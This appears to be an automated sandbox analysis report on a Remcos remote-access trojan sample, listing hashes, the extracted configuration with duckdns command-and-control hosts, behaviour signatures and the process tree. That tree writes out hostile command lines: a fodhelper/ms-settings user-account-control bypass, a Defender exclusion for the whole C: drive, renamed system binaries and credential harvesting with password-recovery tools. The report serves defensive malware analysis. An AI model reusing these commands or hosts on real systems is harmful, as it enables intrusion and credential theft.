Analysis
-
max time kernel
147s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
26-07-2024 03:25
Static task
static1
Behavioral task
behavioral1
Sample
600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe
Resource
win10v2004-20240709-en
General
-
Target
600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe
-
Size
1.0MB
-
MD5
101d89bad85d7a2cee47414f3ca875a4
-
SHA1
e4fbc5f86ccf69b70c02d63ab6b6d025f0106542
-
SHA256
600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3
-
SHA512
c9fd3e12dbb636a54e8710bde6c82ef8a39d162b870fbc0f32f1a695c1a757a9a8153bad08650a1093165e566e35127f883e2c6690e7395aaa507e74c5036982
-
SSDEEP
24576:E6Dlm/atGKanKxvdwEHfZTX0u/nJaRj9yin1mV/aJscLJ:DDcCZfx+GQRjj1mO
Malware Config
Extracted
remcos
RemoteHost
127.0.0.1:45645
127.0.0.1:56765
latestgrace2024.duckdns.org:56765
latestgrace2024.duckdns.org:45645
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-2ZXBPR
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
Processes:
resource yara_rule behavioral2/memory/3000-101-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/2760-100-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/4308-104-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/3000-101-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/2760-100-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ioeztdcY.pifper.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation ioeztdcY.pif Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation per.exe -
Executes dropped EXE 20 IoCs
Processes:
ioeztdcY.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exeper.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exepid process 536 ioeztdcY.pif 1336 alpha.exe 3900 alpha.exe 2088 alpha.exe 1848 alpha.exe 2624 alpha.exe 636 alpha.exe 4408 xkn.exe 1752 alpha.exe 4252 ger.exe 4176 per.exe 3736 alpha.exe 2756 alpha.exe 4560 alpha.exe 5044 alpha.exe 5096 alpha.exe 3128 alpha.exe 2176 alpha.exe 3912 alpha.exe 2456 alpha.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
SndVol.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts SndVol.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ycdtzeoi = "C:\\Users\\Public\\Ycdtzeoi.url" 600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exeSndVol.exedescription pid process target process PID 820 set thread context of 536 820 600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe ioeztdcY.pif PID 3984 set thread context of 2760 3984 SndVol.exe SndVol.exe PID 3984 set thread context of 3000 3984 SndVol.exe SndVol.exe PID 3984 set thread context of 4308 3984 SndVol.exe SndVol.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
SndVol.exe600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exeioeztdcY.pifextrac32.exeSndVol.exeSndVol.exeSndVol.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SndVol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ioeztdcY.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SndVol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SndVol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SndVol.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
alpha.exePING.EXEpid process 2756 alpha.exe 1692 PING.EXE -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 1448 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
ger.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\ms-settings\shell\open\command ger.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\ms-settings ger.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\ms-settings\shell ger.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\ms-settings\shell\open ger.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe -
Processes:
xkn.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e xkn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e xkn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 xkn.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 26 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
xkn.exe600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exeSndVol.exeSndVol.exepid process 4408 xkn.exe 4408 xkn.exe 4408 xkn.exe 820 600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe 820 600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe 2760 SndVol.exe 2760 SndVol.exe 4308 SndVol.exe 4308 SndVol.exe 2760 SndVol.exe 2760 SndVol.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
SndVol.exepid process 3984 SndVol.exe 3984 SndVol.exe 3984 SndVol.exe 3984 SndVol.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
xkn.exetaskkill.exeSndVol.exedescription pid process Token: SeDebugPrivilege 4408 xkn.exe Token: SeDebugPrivilege 1448 taskkill.exe Token: SeDebugPrivilege 4308 SndVol.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
SndVol.exepid process 3984 SndVol.exe -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
SndVol.exepid process 3984 SndVol.exe 3984 SndVol.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exeioeztdcY.pifcmd.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exedescription pid process target process PID 820 wrote to memory of 536 820 600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe ioeztdcY.pif PID 820 wrote to memory of 536 820 600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe ioeztdcY.pif PID 820 wrote to memory of 536 820 600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe ioeztdcY.pif PID 820 wrote to memory of 536 820 600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe ioeztdcY.pif PID 820 wrote to memory of 536 820 600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe ioeztdcY.pif PID 536 wrote to memory of 3608 536 ioeztdcY.pif cmd.exe PID 536 wrote to memory of 3608 536 ioeztdcY.pif cmd.exe PID 3608 wrote to memory of 5012 3608 cmd.exe extrac32.exe PID 3608 wrote to memory of 5012 3608 cmd.exe extrac32.exe PID 3608 wrote to memory of 1336 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 1336 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 3900 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 3900 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 2088 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 2088 3608 cmd.exe alpha.exe PID 2088 wrote to memory of 4004 2088 alpha.exe extrac32.exe PID 2088 wrote to memory of 4004 2088 alpha.exe extrac32.exe PID 3608 wrote to memory of 1848 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 1848 3608 cmd.exe alpha.exe PID 1848 wrote to memory of 2100 1848 alpha.exe extrac32.exe PID 1848 wrote to memory of 2100 1848 alpha.exe extrac32.exe PID 3608 wrote to memory of 2624 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 2624 3608 cmd.exe alpha.exe PID 2624 wrote to memory of 1792 2624 alpha.exe extrac32.exe PID 2624 wrote to memory of 1792 2624 alpha.exe extrac32.exe PID 3608 wrote to memory of 636 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 636 3608 cmd.exe alpha.exe PID 636 wrote to memory of 4408 636 alpha.exe xkn.exe PID 636 wrote to memory of 4408 636 alpha.exe xkn.exe PID 4408 wrote to memory of 1752 4408 xkn.exe alpha.exe PID 4408 wrote to memory of 1752 4408 xkn.exe alpha.exe PID 1752 wrote to memory of 4252 1752 alpha.exe ger.exe PID 1752 wrote to memory of 4252 1752 alpha.exe ger.exe PID 3608 wrote to memory of 4176 3608 cmd.exe per.exe PID 3608 wrote to memory of 4176 3608 cmd.exe per.exe PID 3608 wrote to memory of 3736 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 3736 3608 cmd.exe alpha.exe PID 3736 wrote to memory of 1448 3736 alpha.exe taskkill.exe PID 3736 wrote to memory of 1448 3736 alpha.exe taskkill.exe PID 820 wrote to memory of 2572 820 600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe extrac32.exe PID 820 wrote to memory of 2572 820 600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe extrac32.exe PID 820 wrote to memory of 2572 820 600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe extrac32.exe PID 820 wrote to memory of 3984 820 600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe SndVol.exe PID 820 wrote to memory of 3984 820 600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe SndVol.exe PID 820 wrote to memory of 3984 820 600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe SndVol.exe PID 820 wrote to memory of 3984 820 600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe SndVol.exe PID 3608 wrote to memory of 2756 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 2756 3608 cmd.exe alpha.exe PID 2756 wrote to memory of 1692 2756 alpha.exe PING.EXE PID 2756 wrote to memory of 1692 2756 alpha.exe PING.EXE PID 3608 wrote to memory of 4560 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 4560 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 5044 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 5044 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 5096 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 5096 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 3128 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 3128 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 2176 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 2176 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 3912 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 3912 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 2456 3608 cmd.exe alpha.exe PID 3608 wrote to memory of 2456 3608 cmd.exe alpha.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe"C:\Users\Admin\AppData\Local\Temp\600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Users\Public\Libraries\ioeztdcY.pifC:\Users\Public\Libraries\ioeztdcY.pif2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CAC2.tmp\CAC3.tmp\CAC4.bat C:\Users\Public\Libraries\ioeztdcY.pif"3⤵
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"4⤵PID:5012
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "4⤵
- Executes dropped EXE
PID:1336 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"4⤵
- Executes dropped EXE
PID:3900 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"5⤵PID:4004
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"5⤵PID:2100
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"5⤵PID:1792
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""7⤵
- Executes dropped EXE
- Modifies registry class
PID:4252 -
C:\Windows \System32\per.exe"C:\\Windows \\System32\\per.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
PID:4176 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3736 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1448 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 24⤵
- Executes dropped EXE
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 25⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1692 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"4⤵
- Executes dropped EXE
PID:4560 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"4⤵
- Executes dropped EXE
PID:5044 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"4⤵
- Executes dropped EXE
PID:5096 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:3128 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:2176 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:3912 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:2456 -
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Admin\AppData\Local\Temp\600b2be3d1429ba2716b05ed76d109815eb60426a2d3687c6735aece9dc9c5a3.exe C:\\Users\\Public\\Libraries\\Ycdtzeoi.PIF2⤵
- System Location Discovery: System Language Discovery
PID:2572 -
C:\Windows\SysWOW64\SndVol.exeC:\Windows\System32\SndVol.exe2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3984 -
C:\Windows\SysWOW64\SndVol.exeC:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\xywzpufdhst"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2760 -
C:\Windows\SysWOW64\SndVol.exeC:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\zsbkhnqwvalgwb"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:3000 -
C:\Windows\SysWOW64\SndVol.exeC:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\kupcifbyjidlyhsnxk"3⤵PID:4600
-
C:\Windows\SysWOW64\SndVol.exeC:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\kupcifbyjidlyhsnxk"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4308
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper1⤵PID:4424
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
222B
MD53e1ef0c5cf5ebfef8ec6885123a2062b
SHA1560e4439e0baeb8749c19fc8de19d1d62fd90388
SHA256a66c85f0c5a9ea3ae2f0eb23b72f9684092aa98f410f924a5ef5bd4ca9c91828
SHA512761d6cda00afa4f96eb178307392b6de69357182bcf1ea1944e97d01a26250d8706173271a4786a9053f085ae4476a33338959c3bcf605817db6acbc0da7af84
-
Filesize
1KB
MD5e62f427202d3e5a3ba60ebe78567918c
SHA16ef0cd5ba6c871815fceb27ff095a7931452b334
SHA25606bee225a830ea0e67b91fd7d24280c5315ef82049b25b07c9cfde4e36a639ff
